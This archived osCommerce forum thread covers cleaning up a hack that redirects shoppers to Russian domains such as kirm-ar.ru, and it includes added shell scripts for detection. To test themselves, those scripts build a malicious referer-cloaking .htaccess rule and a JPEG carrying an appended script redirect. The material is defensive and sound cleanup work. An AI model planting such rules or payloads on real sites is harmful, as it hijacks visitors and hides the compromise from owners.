
Archived

This topic is now archived and is closed to further replies.

rojna

redirect to spam in admin ---> kirm-ar.ru

Recommended Posts

1. Fix your site, which has been hacked, and lock it down so future hacks will be unsuccessful. There is a security thread which you can follow.

2. Inform Google (via webmaster tools) that your site is now cleansed (if necessary, have you checked your search results in Google?).


I now see not only is the admin affected but the store itself :(

How did this happen ??

Is this a problem with my provider or oscommerce ??

Greg,

 

I am currently working on this same problem for a client. Look for an indox.php file (careful, this is a trojan) in your root and includes directories. Also, remove all goog1e... files from the site.

 

Add the security contributions listed in this thread:

 

How to Secure your Site

 

I have not yet completely cleansed the site; there is still at least one more occurrence I have yet to find. I will post if I have any further revelations.

 

 

Chris


Thanks Chris

I did find some goog1e files in the catalog and images folders, but don't see an indox.php file.

Removing the goog1e... files didn't fix the problem :(

Share this post


Link to post
Share on other sites

Greg,

 

I have 9 hours into this already. I didn't think that just removing the goog1e files would solve the problem, but I was hinting at a direction to take to get started. This redirection exploit uses a back door. Secure your site and look for the problem.

 

BTW, I already deleted more than 3000 hacker files from the site I am working on currently, and there are still some pending deletion... if I can find them.

 

 

 

Chris


Ok,

 

I have found more than 600 .jpg files with the URL embedded in the image. I have removed them and the site no longer redirects customers to the hack site.

 

However, if you look at the progress bar in the bottom left of the browser, it still says it's trying to send/receive data to that domain.

 

So, I will continue to search out this monster and evict it.

 

 

Chris


I have the same problem. I haven't checked the images yet, but I did find a couple of hacked .htaccess files. These have a bunch of rewrite conditions matching HTTP_REFERER to sites like LinkedIn, Facebook, Flickr, Google, YouTube, etc., ending with a rewrite rule pointing to kirm-ar.ru.

 

I think those might be stopping me from using the file editor in cPanel to update anything. On the other hand, renaming them seems to work just fine...

Ralph,

 

I just completed the removal of this redirect for a client. It was one of the most difficult cleanings I have done in a long time. You should look for anomalous files and check each file for malicious code. ALSO, you will need to use a tool such as grep to look for the attack site URL that is being embedded into .jpg files. It was only after searching all files and removing any files with a reference to that site that I was able to fully clean and secure my client's website.

 

 

 

 

 

Chris


I got lucky, I think. Hacked .htaccess files in the user's home directory and public_html, magically reappearing favicon.ico, and goog1e* files in public_html & public_html/images. I used cPanel's backup option to make a tarball to download and verify md5sums against the original files.

 

I *think* the site is clean now.

I found my site had the same hack last night. I FTP'd the whole affected site to my local drive and did a diff with a previous backup. I found several googxxxx files inside the images folder. Deleting those files didn't solve the problem. I didn't find any suspicious code in the .htaccess file. Later, when I checked Hotlink Protection under my cPanel, I found the redirect request was set to krim-ar.ru/command/index.php. I deleted this URL, and the site seems to be back to normal. I don't know how this hack got into my cPanel. I talked to my host's support; they said the redirection was from .htaccess, but they also couldn't find any malicious code in it. I am not sure if my site is completely clean now. Hopefully this can help those people who are experiencing the same problem.

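An added example, not code from any post in this thread, that ties together the two places the redirect was found above: the hacked .htaccess files with HTTP_REFERER conditions that Ralph describes, and the redirect URL that the previous poster found under cPanel's Hotlink Protection. cPanel implements Hotlink Protection by writing exactly such a RewriteCond %{HTTP_REFERER} / RewriteRule block into public_html/.htaccess, which is why the host could say the redirect "came from .htaccess" even though it was entered through the control panel. The script builds a throwaway tree containing a constructed malicious .htaccess (the rule text, referer list and target are assumptions modelled on the posts) and a constructed clean osCommerce-style one, then defines two shell functions: one that lists every .htaccess that both tests the referer and rewrites to an absolute http(s) URL, and one that extracts the external host names a given file redirects to.

```shell
#!/bin/sh
# Added example for this thread. Builds a throwaway tree with a constructed
# malicious .htaccess (modelled on the posts; the exact rule text is an
# assumption) plus a clean one, then scans for the cloaking pattern.
WORK=$(mktemp -d)
mkdir -p "$WORK/public_html/store"

# Constructed sample: visitors arriving from search/social referers are sent
# to the attacker's domain; a direct visit by the site owner sees nothing.
cat > "$WORK/public_html/.htaccess" <<'EOF'
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*flickr.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*youtube.*$ [NC]
RewriteRule .* http://kirm-ar.ru/ [R,L]
EOF

# Constructed clean file for comparison: an osCommerce-style rewrite whose
# target stays on the site must not be flagged.
cat > "$WORK/public_html/store/.htaccess" <<'EOF'
RewriteEngine On
RewriteRule ^product/(.*)$ product_info.php?products_id=$1 [L]
EOF

# find_referer_redirects DIR
# Prints every .htaccess under DIR that both tests HTTP_REFERER and rewrites
# to an absolute http(s):// URL. That pairing is the cloaking pattern from
# the thread (and the shape cPanel Hotlink Protection writes); normal rules
# rewrite to a local path instead.
find_referer_redirects() {
    find "$1" -name .htaccess -type f | while read -r f; do
        if grep -qi 'RewriteCond[[:space:]]*%{HTTP_REFERER}' "$f" \
            && grep -qiE 'RewriteRule[[:space:]].*[[:space:]]https?://' "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# redirect_targets FILE
# Prints the external host names FILE rewrites to, one per line, for
# comparison with the list of attacker domains posted later in the thread.
redirect_targets() {
    grep -ioE 'RewriteRule[[:space:]].*[[:space:]]https?://[^/[:space:]]+' "$1" \
        | sed -E 's#.*https?://##' | sort -u
}

# Stand-alone demo output: flagged file -> external target(s).
find_referer_redirects "$WORK" | while read -r f; do
    printf '%s -> %s\n' "$f" "$(redirect_targets "$f" | tr '\n' ' ')"
done
```

Redirecting only visitors who arrive from search engines and social sites is what keeps the owner from noticing: a direct visit never triggers the rule, so the store looks fine from the admin's own browser. Run the scan over the whole home directory, not only the store, since the posts found copies in the user's home directory, public_html and the store subdirectory, and check the Hotlink Protection page in cPanel as well, because clearing the rule from the file does not clear the setting that regenerates it.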

Found the redirect link in the .htaccess files both in the main public_html dir. and in the store dir., deleted it and all seems to work again.

 

also renamed the ADMIN folder and added FWR Security Pro

I've been fighting off this hacker for about four months now. I've wasted days and maybe weeks of time and had sites dropped from Google.

All the bad sites which are redirected to are Russian and include:

tutaanti.ru/cron/index.php

julyrelax.ru/catalog/index.php

allow-strike.ru/system/index.php

kirm-ar.ru

kirm-sky.ru

 

Since I deleted all my other scripts and under construction websites, I narrowed the problem down to OScommerce.

In the last couple of days, I've installed the SecurityPro addon and removed goog.... files.

Fingers are crossed but I'm expecting the battle to continue.

--------------------------------------------------

How does one know if a URL is embedded in an image file?


 

If you can get the images to a place where you can use grep, you could try

 

grep http <image>

 

in each image.

 

I wonder if the url-embedded-in-images trick would survive the image being manipulated? I don't have so many images yet that I couldn't simply schedule a cron job to convert from jpg to png and back. It wouldn't even be too hard to keep known clean copies of images outside the document tree and copy them over occasionally.

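An added example, not from any post above, for the file-hunting side of the cleanup that several replies describe: grepping image files for an embedded URL (Chris's grep advice and the `grep http <image>` suggestion in the last reply), finding files with the goog1e* and indox.php names mentioned early in the thread, and comparing md5sums against a clean backup as Ralph did. The sample tree, the fake image bytes, the file names and the md5 baseline are all constructed here for the demo; only the URL and naming patterns come from the posts.

```shell
#!/bin/sh
# Added example for this thread. Every file below is constructed for the
# demo: two fake "JPEGs" (just the SOI/APP0 and EOI markers around filler),
# a small index.php, and an md5 manifest standing in for a clean backup.
WORK=$(mktemp -d)
mkdir -p "$WORK/images"
printf '\377\330\377\340JFIF-clean-image-bytes\377\331' > "$WORK/images/product1.jpg"
cp "$WORK/images/product1.jpg" "$WORK/images/product2.jpg"
printf '<?php echo "hello"; ?>\n' > "$WORK/index.php"

# Baseline manifest, as if generated from the last known-clean backup.
( cd "$WORK" && md5sum images/product1.jpg images/product2.jpg index.php ) > "$WORK/baseline.md5"

# The simulated compromise: a script carrying the attacker URL is appended
# after the JPEG end-of-image marker (decoders ignore anything after it, so
# the picture still displays), and a goog1e* file appears in images/.
printf '<script>location="http://kirm-ar.ru/command/index.php"</script>' >> "$WORK/images/product2.jpg"
printf 'GIF89a\n' > "$WORK/images/goog1e5a8c.php"

# urls_in_images DIR
# Prints "file: url" for every http(s) URL found inside an image file.
# -a makes grep treat binary data as text, so the URL itself is shown
# instead of "Binary file matches"; LC_ALL=C avoids multibyte confusion.
urls_in_images() {
    find "$1" -type f \( -name '*.jpg' -o -name '*.jpeg' -o -name '*.png' -o -name '*.gif' \) \
    | while read -r f; do
        LC_ALL=C grep -aoE 'https?://[^"[:space:]<>]+' "$f" | sed "s#^#$f: #"
    done
}

# suspect_names DIR
# The file names the posts above tie to this infection.
suspect_names() {
    find "$1" -type f \( -name 'goog1e*' -o -name 'indox.php' \)
}

# changed_files MANIFEST DIR
# Prints each manifest path whose md5 differs from the baseline or that is
# missing. Files added since the backup are not in the manifest, so pair
# this with suspect_names or a find -newer search for new files.
changed_files() {
    manifest=$1; root=$2
    while read -r sum path; do
        now=$( (cd "$root" && md5sum "$path" 2>/dev/null) | cut -d' ' -f1 )
        [ "$now" = "$sum" ] || printf '%s\n' "$path"
    done < "$manifest"
}

# Stand-alone demo output.
echo "== URLs embedded in image files";       urls_in_images "$WORK"
echo "== suspicious file names";              suspect_names "$WORK"
echo "== files changed or missing vs backup"; changed_files "$WORK/baseline.md5" "$WORK"
```

A JPEG decoder stops at the FF D9 end-of-image marker, so a trailer appended after it is invisible in the rendered picture but a single grep away; for the same reason, re-encoding the image (jpg to png and back, as the last reply considers) discards that trailer. The manifest check only reports files that were modified or deleted relative to the backup, which is why the posts that relied on diffs and md5sums still had to hunt for dropped files by name.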